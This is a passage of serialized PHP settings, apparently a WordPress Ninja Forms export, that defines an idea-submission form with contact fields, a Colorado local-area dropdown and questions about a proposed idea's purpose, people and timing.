\"calc_option\";s:1:\"0\";s:11:\"placeholder\";s:0:\"\";s:13:\"disable_input\";s:1:\"0\";s:11:\"input_limit\";s:0:\"\";s:16:\"input_limit_type\";s:4:\"char\";s:15:\"input_limit_msg\";s:0:\"\";s:10:\"user_state\";s:1:\"0\";s:16:\"autocomplete_off\";s:1:\"0\";s:8:\"num_sort\";s:1:\"0\";s:11:\"admin_label\";s:0:\"\";s:26:\"user_info_field_group_name\";s:0:\"\";s:28:\"user_info_field_group_custom\";s:0:\"\";s:9:\"show_desc\";s:1:\"0\";s:8:\"desc_pos\";s:4:\"none\";s:9:\"desc_text\";s:0:\"\";s:13:\"element_class\";s:0:\"\";s:8:\"required\";s:1:\"1\";s:3:\"key\";s:9:\"email_241\";s:7:\"default\";s:0:\"\";s:15:\"container_class\";s:14:\"one-half first\";s:11:\"field_label\";s:5:\"Email\";s:9:\"field_key\";s:9:\"email_241\";s:21:\"custom_name_attribute\";s:5:\"email\";s:23:\"personally_identifiable\";s:1:\"1\";s:5:\"value\";s:0:\"\";}s:2:\"id\";i:81;}i:4;a:2:{s:8:\"settings\";a:51:{s:10:\"objectType\";s:5:\"Field\";s:12:\"objectDomain\";s:6:\"fields\";s:10:\"editActive\";b:0;s:5:\"order\";i:5;s:11:\"idAttribute\";s:2:\"id\";s:4:\"type\";s:5:\"phone\";s:6:\"def_id\";s:2:\"15\";s:5:\"label\";s:5:\"Phone\";s:9:\"label_pos\";s:5:\"above\";s:4:\"mask\";s:14:\"(999) 999-9999\";s:10:\"datepicker\";s:1:\"0\";s:10:\"first_name\";s:1:\"0\";s:9:\"last_name\";s:1:\"0\";s:9:\"from_name\";s:1:\"0\";s:14:\"user_address_1\";s:1:\"0\";s:14:\"user_address_2\";s:1:\"0\";s:9:\"user_city\";s:1:\"0\";s:8:\"user_zip\";s:1:\"0\";s:10:\"user_email\";s:1:\"0\";s:21:\"user_info_field_group\";s:1:\"1\";s:9:\"show_help\";s:1:\"0\";s:9:\"help_text\";s:0:\"\";s:17:\"calc_auto_include\";s:1:\"0\";s:11:\"calc_option\";s:1:\"0\";s:11:\"placeholder\";s:0:\"\";s:13:\"disable_input\";s:1:\"0\";s:11:\"input_limit\";s:0:\"\";s:16:\"input_limit_type\";s:4:\"char\";s:15:\"input_limit_msg\";s:0:\"\";s:10:\"user_state\";s:1:\"0\";s:16:\"autocomplete_off\";s:1:\"0\";s:8:\"num_sort\";s:1:\"0\";s:11:\"admin_label\";s:0:\"\";s:26:\"user_info_field_group_name\";s:0:\"\";s:28:\"user_info_field_group_custom\";s:0:\"\";s:9:\"show_desc\";s:1:\"0\";s:8:\"desc_pos\";s:4:\"none\";s:9:\"desc_text\";s:0:\"\";s:13:\"element_class\";s:0:\"\";s:8:\"required\";s:1:\"1\";s:3:\"key\";s:9:\"phone_242\";s:7:\"default\";s:0:\"\";s:15:\"container_class\";s:8:\"one-half\";s:10:\"manual_key\";s:0:\"\";s:11:\"custom_mask\";s:0:\"\";s:11:\"field_label\";s:5:\"Phone\";s:9:\"field_key\";s:9:\"phone_242\";s:21:\"custom_name_attribute\";s:5:\"phone\";s:23:\"personally_identifiable\";s:1:\"1\";s:5:\"value\";s:0:\"\";s:14:\"drawerDisabled\";b:0;}s:2:\"id\";i:82;}i:5;a:2:{s:8:\"settings\";a:31:{s:10:\"objectType\";s:5:\"Field\";s:12:\"objectDomain\";s:6:\"fields\";s:10:\"editActive\";b:0;s:5:\"order\";i:6;s:11:\"idAttribute\";s:2:\"id\";s:4:\"type\";s:10:\"listselect\";s:5:\"label\";s:15:\"Your Local Area\";s:15:\"input_limit_msg\";s:17:\"character(s) left\";s:9:\"label_pos\";s:5:\"above\";s:9:\"list_type\";s:8:\"dropdown\";s:10:\"multi_size\";s:1:\"5\";s:15:\"list_show_value\";s:1:\"1\";s:4:\"list\";a:0:{}s:21:\"user_info_field_group\";s:0:\"\";s:17:\"calc_auto_include\";s:1:\"0\";s:10:\"user_state\";s:1:\"0\";s:8:\"num_sort\";s:1:\"0\";s:11:\"admin_label\";s:0:\"\";s:9:\"show_help\";s:1:\"0\";s:9:\"help_text\";s:0:\"\";s:9:\"show_desc\";s:1:\"0\";s:8:\"desc_pos\";s:4:\"none\";s:9:\"desc_text\";s:0:\"\";s:13:\"element_class\";s:0:\"\";s:8:\"required\";s:1:\"1\";s:7:\"options\";a:7:{i:0;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:13:\"Please Select\";s:5:\"value\";s:13:\"Please Select\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:1;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:7:\"Boulder\";s:5:\"value\";s:7:\"Boulder\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:2;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:10:\"Co Springs\";s:5:\"value\";s:10:\"Co Springs\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:3;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:6:\"Denver\";s:5:\"value\";s:6:\"Denver\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:4;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:8:\"Loveland\";s:5:\"value\";s:8:\"Loveland\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:5;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:13:\"Western Slope\";s:5:\"value\";s:13:\"Western Slope\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:6;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:8:\"selected\";s:1:\"0\";s:5:\"label\";s:5:\"Other\";s:5:\"value\";s:5:\"Other\";s:4:\"calc\";s:0:\"\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}}s:3:\"key\";s:14:\"listselect_243\";s:15:\"container_class\";s:14:\"one-half first\";s:11:\"field_label\";s:15:\"Your Local Area\";s:9:\"field_key\";s:14:\"listselect_243\";s:14:\"drawerDisabled\";b:0;}s:2:\"id\";i:83;}i:6;a:2:{s:8:\"settings\";a:16:{s:10:\"objectType\";s:5:\"Field\";s:12:\"objectDomain\";s:6:\"fields\";s:10:\"editActive\";b:0;s:5:\"order\";i:7;s:11:\"idAttribute\";s:2:\"id\";s:4:\"type\";s:2:\"hr\";s:5:\"label\";s:2:\"hr\";s:15:\"input_limit_msg\";s:17:\"character(s) left\";s:9:\"show_desc\";s:1:\"0\";s:8:\"desc_pos\";s:4:\"none\";s:9:\"desc_text\";s:0:\"\";s:13:\"element_class\";s:0:\"\";s:3:\"key\";s:6:\"hr_244\";s:15:\"container_class\";s:0:\"\";s:11:\"field_label\";s:2:\"hr\";s:9:\"field_key\";s:6:\"hr_244\";}s:2:\"id\";i:84;}i:7;a:2:{s:8:\"settings\";a:19:{s:10:\"objectType\";s:5:\"Field\";s:12:\"objectDomain\";s:6:\"fields\";s:10:\"editActive\";b:0;s:5:\"order\";i:8;s:11:\"idAttribute\";s:2:\"id\";s:4:\"type\";s:4:\"html\";s:5:\"label\";s:18:\"What Is Your Idea?\";s:15:\"input_limit_msg\";s:17:\"character(s) left\";s:13:\"default_value\";s:179:\"<h3><span style=\"color: #23507d;\"><strong><span class=\"bfLegend-l\"><span class=\"bfLegend-r\"><span class=\"bfLegend-m\">What Is Your Idea?</span></span></span></strong></span></h3>\r\n\";s:7:\"desc_el\";s:3:\"div\";s:9:\"show_desc\";s:1:\"0\";s:8:\"desc_pos\";s:4:\"none\";s:9:\"desc_text\";s:0:\"\";s:13:\"element_class\";s:0:\"\";s:7:\"default\";s:179:\"<h3><span style=\"color: #23507d;\"><strong><span class=\"bfLegend-l\"><span class=\"bfLegend-r\"><span class=\"bfLegend-m\">What Is Your Idea?</span></span></span></strong></span></h3>\r\n\";s:3:\"key\";s:8:\"html_245\";s:15:\"container_class\";s:0:\"\";s:11:\"field_label\";s:18:\"What Is Your Idea?\";s:9:\"field_key\";s:8:\"html_245\";}s:2:\"id\";i:85;}i:8;a:2:{s:8:\"settings\";a:48:{s:10:\"objectType\";s:5:\"Field\";s:12:\"objectDomain\";s:6:\"fields\";s:10:\"editActive\";b:0;s:5:\"order\";i:9;s:11:\"idAttribute\";s:2:\"id\";s:4:\"type\";s:7:\"textbox\";s:5:\"label\";s:23:\" Give Your Idea A Title\";s:15:\"input_limit_msg\";s:17:\"character(s) left\";s:9:\"label_pos\";s:5:\"above\";s:11:\"placeholder\";s:0:\"\";s:10:\"first_name\";s:0:\"\";s:9:\"last_name\";s:0:\"\";s:14:\"user_address_1\";s:0:\"\";s:14:\"user_address_2\";s:0:\"\";s:9:\"user_city\";s:0:\"\";s:8:\"user_zip\";s:0:\"\";s:10:\"user_phone\";s:0:\"\";s:10:\"user_email\";s:0:\"\";s:21:\"user_info_field_group\";s:1:\"1\";s:13:\"disable_input\";s:1:\"0\";s:4:\"mask\";s:0:\"\";s:11:\"input_limit\";s:0:\"\";s:16:\"input_limit_type\";s:4:\"char\";s:17:\"calc_auto_include\";s:1:\"0\";s:10:\"datepicker\";s:1:\"0\";s:10:\"user_state\";s:1:\"0\";s:16:\"autocomplete_off\";s:1:\"0\";s:8:\"num_sort\";s:1:\"0\";s:11:\"admin_label\";s:0:\"\";s:26:\"user_info_field_group_name\";s:0:\"\";s:28:\"user_info_field_group_custom\";s:0:\"\";s:9:\"show_help\";s:1:\"0\";s:9:\"help_text\";s:0:\"\";s:9:\"show_desc\";s:1:\"0\";s:8:\"desc_pos\";s:4:\"none\";s:9:\"desc_text\";s:0:\"\";s:13:\"element_class\";s:0:\"\";s:8:\"required\";s:1:\"1\";s:3:\"key\";s:11:\"textbox_256\";s:7:\"default\";s:0:\"\";s:15:\"container_class\";s:0:\"\";s:10:\"manual_key\";s:0:\"\";s:11:\"custom_mask\";s:0:\"\";s:11:\"field_label\";s:23:\" Give Your Idea A Title\";s:9:\"field_key\";s:11:\"textbox_256\";s:21:\"custom_name_attribute\";s:0:\"\";s:23:\"personally_identifiable\";s:0:\"\";s:5:\"value\";s:0:\"\";}s:2:\"id\";i:86;}i:9;a:2:{s:8:\"settings\";a:33:{s:10:\"objectType\";s:5:\"Field\";s:12:\"objectDomain\";s:6:\"fields\";s:10:\"editActive\";b:0;s:5:\"order\";i:10;s:11:\"idAttribute\";s:2:\"id\";s:4:\"type\";s:8:\"textarea\";s:5:\"label\";s:30:\"Enter The Details of Your Idea\";s:15:\"input_limit_msg\";s:17:\"character(s) left\";s:9:\"label_pos\";s:5:\"above\";s:13:\"default_value\";s:0:\"\";s:12:\"textarea_rte\";s:1:\"0\";s:14:\"textarea_media\";s:1:\"0\";s:18:\"disable_rte_mobile\";s:1:\"0\";s:11:\"input_limit\";s:0:\"\";s:16:\"input_limit_type\";s:4:\"char\";s:17:\"calc_auto_include\";s:1:\"0\";s:8:\"num_sort\";s:1:\"0\";s:11:\"admin_label\";s:0:\"\";s:9:\"show_help\";s:1:\"0\";s:9:\"help_text\";s:0:\"\";s:9:\"show_desc\";s:1:\"0\";s:8:\"desc_pos\";s:4:\"none\";s:9:\"desc_text\";s:0:\"\";s:13:\"element_class\";s:0:\"\";s:8:\"required\";s:1:\"1\";s:7:\"default\";s:0:\"\";s:3:\"key\";s:12:\"textarea_253\";s:11:\"placeholder\";s:0:\"\";s:15:\"container_class\";s:0:\"\";s:10:\"manual_key\";s:0:\"\";s:11:\"field_label\";s:30:\"Enter The Details of Your Idea\";s:9:\"field_key\";s:12:\"textarea_253\";s:5:\"value\";s:0:\"\";}s:2:\"id\";i:87;}i:10;a:2:{s:8:\"settings\";a:48:{s:10:\"objectType\";s:5:\"Field\";s:12:\"objectDomain\";s:6:\"fields\";s:10:\"editActive\";b:0;s:5:\"order\";i:11;s:11:\"idAttribute\";s:2:\"id\";s:4:\"type\";s:7:\"textbox\";s:5:\"label\";s:54:\"Why Should It Be Done (what is the spiritual purpose?)\";s:15:\"input_limit_msg\";s:17:\"character(s) left\";s:9:\"label_pos\";s:5:\"above\";s:11:\"placeholder\";s:0:\"\";s:10:\"first_name\";s:0:\"\";s:9:\"last_name\";s:0:\"\";s:14:\"user_address_1\";s:0:\"\";s:14:\"user_address_2\";s:0:\"\";s:9:\"user_city\";s:0:\"\";s:8:\"user_zip\";s:0:\"\";s:10:\"user_phone\";s:0:\"\";s:10:\"user_email\";s:0:\"\";s:21:\"user_info_field_group\";s:1:\"1\";s:13:\"disable_input\";s:1:\"0\";s:4:\"mask\";s:0:\"\";s:11:\"input_limit\";s:0:\"\";s:16:\"input_limit_type\";s:4:\"char\";s:17:\"calc_auto_include\";s:1:\"0\";s:10:\"datepicker\";s:1:\"0\";s:10:\"user_state\";s:1:\"0\";s:16:\"autocomplete_off\";s:1:\"0\";s:8:\"num_sort\";s:1:\"0\";s:11:\"admin_label\";s:0:\"\";s:26:\"user_info_field_group_name\";s:0:\"\";s:28:\"user_info_field_group_custom\";s:0:\"\";s:9:\"show_help\";s:1:\"0\";s:9:\"help_text\";s:0:\"\";s:9:\"show_desc\";s:1:\"0\";s:8:\"desc_pos\";s:4:\"none\";s:9:\"desc_text\";s:0:\"\";s:13:\"element_class\";s:0:\"\";s:8:\"required\";s:1:\"1\";s:3:\"key\";s:11:\"textbox_257\";s:7:\"default\";s:0:\"\";s:15:\"container_class\";s:0:\"\";s:10:\"manual_key\";s:0:\"\";s:11:\"custom_mask\";s:0:\"\";s:11:\"field_label\";s:54:\"Why Should It Be Done (what is the spiritual purpose?)\";s:9:\"field_key\";s:11:\"textbox_257\";s:21:\"custom_name_attribute\";s:0:\"\";s:23:\"personally_identifiable\";s:0:\"\";s:5:\"value\";s:0:\"\";}s:2:\"id\";i:88;}i:11;a:2:{s:8:\"settings\";a:48:{s:10:\"objectType\";s:5:\"Field\";s:12:\"objectDomain\";s:6:\"fields\";s:10:\"editActive\";b:0;s:5:\"order\";i:12;s:11:\"idAttribute\";s:2:\"id\";s:4:\"type\";s:7:\"textbox\";s:5:\"label\";s:37:\"Who Will Do It (you or someone else?)\";s:15:\"input_limit_msg\";s:17:\"character(s) left\";s:9:\"label_pos\";s:5:\"above\";s:11:\"placeholder\";s:0:\"\";s:10:\"first_name\";s:0:\"\";s:9:\"last_name\";s:0:\"\";s:14:\"user_address_1\";s:0:\"\";s:14:\"user_address_2\";s:0:\"\";s:9:\"user_city\";s:0:\"\";s:8:\"user_zip\";s:0:\"\";s:10:\"user_phone\";s:0:\"\";s:10:\"user_email\";s:0:\"\";s:21:\"user_info_field_group\";s:1:\"1\";s:13:\"disable_input\";s:1:\"0\";s:4:\"mask\";s:0:\"\";s:11:\"input_limit\";s:0:\"\";s:16:\"input_limit_type\";s:4:\"char\";s:17:\"calc_auto_include\";s:1:\"0\";s:10:\"datepicker\";s:1:\"0\";s:10:\"user_state\";s:1:\"0\";s:16:\"autocomplete_off\";s:1:\"0\";s:8:\"num_sort\";s:1:\"0\";s:11:\"admin_label\";s:0:\"\";s:26:\"user_info_field_group_name\";s:0:\"\";s:28:\"user_info_field_group_custom\";s:0:\"\";s:9:\"show_help\";s:1:\"0\";s:9:\"help_text\";s:0:\"\";s:9:\"show_desc\";s:1:\"0\";s:8:\"desc_pos\";s:4:\"none\";s:9:\"desc_text\";s:0:\"\";s:13:\"element_class\";s:0:\"\";s:8:\"required\";s:1:\"1\";s:3:\"key\";s:11:\"textbox_258\";s:7:\"default\";s:0:\"\";s:15:\"container_class\";s:0:\"\";s:10:\"manual_key\";s:0:\"\";s:11:\"custom_mask\";s:0:\"\";s:11:\"field_label\";s:37:\"Who Will Do It (you or someone else?)\";s:9:\"field_key\";s:11:\"textbox_258\";s:21:\"custom_name_attribute\";s:0:\"\";s:23:\"personally_identifiable\";s:0:\"\";s:5:\"value\";s:0:\"\";}s:2:\"id\";i:89;}i:12;a:2:{s:8:\"settings\";a:48:{s:10:\"objectType\";s:5:\"Field\";s:12:\"objectDomain\";s:6:\"fields\";s:10:\"editActive\";b:0;s:5:\"order\";i:13;s:11:\"idAttribute\";s:2:\"id\";s:4:\"type\";s:7:\"textbox\";s:5:\"label\";s:53:\"How Many People Will Be Required To Make This Happen?\";s:15:\"input_limit_msg\";s:17:\"character(s) left\";s:9:\"label_pos\";s:5:\"above\";s:11:\"placeholder\";s:0:\"\";s:10:\"first_name\";s:0:\"\";s:9:\"last_name\";s:0:\"\";s:14:\"user_address_1\";s:0:\"\";s:14:\"user_address_2\";s:0:\"\";s:9:\"user_city\";s:0:\"\";s:8:\"user_zip\";s:0:\"\";s:10:\"user_phone\";s:0:\"\";s:10:\"user_email\";s:0:\"\";s:21:\"user_info_field_group\";s:1:\"1\";s:13:\"disable_input\";s:1:\"0\";s:4:\"mask\";s:0:\"\";s:11:\"input_limit\";s:0:\"\";s:16:\"input_limit_type\";s:4:\"char\";s:17:\"calc_auto_include\";s:1:\"0\";s:10:\"datepicker\";s:1:\"0\";s:10:\"user_state\";s:1:\"0\";s:16:\"autocomplete_off\";s:1:\"0\";s:8:\"num_sort\";s:1:\"0\";s:11:\"admin_label\";s:0:\"\";s:26:\"user_info_field_group_name\";s:0:\"\";s:28:\"user_info_field_group_custom\";s:0:\"\";s:9:\"show_help\";s:1:\"0\";s:9:\"help_text\";s:0:\"\";s:9:\"show_desc\";s:1:\"0\";s:8:\"desc_pos\";s:4:\"none\";s:9:\"desc_text\";s:0:\"\";s:13:\"element_class\";s:0:\"\";s:8:\"required\";s:1:\"1\";s:3:\"key\";s:11:\"textbox_259\";s:7:\"default\";s:0:\"\";s:15:\"container_class\";s:0:\"\";s:10:\"manual_key\";s:0:\"\";s:11:\"custom_mask\";s:0:\"\";s:11:\"field_label\";s:53:\"How Many People Will Be Required To Make This Happen?\";s:9:\"field_key\";s:11:\"textbox_259\";s:21:\"custom_name_attribute\";s:0:\"\";s:23:\"personally_identifiable\";s:0:\"\";s:5:\"value\";s:0:\"\";}s:2:\"id\";i:90;}i:13;a:2:{s:8:\"settings\";a:48:{s:10:\"objectType\";s:5:\"Field\";s:12:\"objectDomain\";s:6:\"fields\";s:10:\"editActive\";b:0;s:5:\"order\";i:14;s:11:\"idAttribute\";s:2:\"id\";s:4:\"type\";s:7:\"textbox\";s:5:\"label\";s:23:\"When Would This Happen?\";s:15:\"input_limit_msg\";s:17:\"character(s) 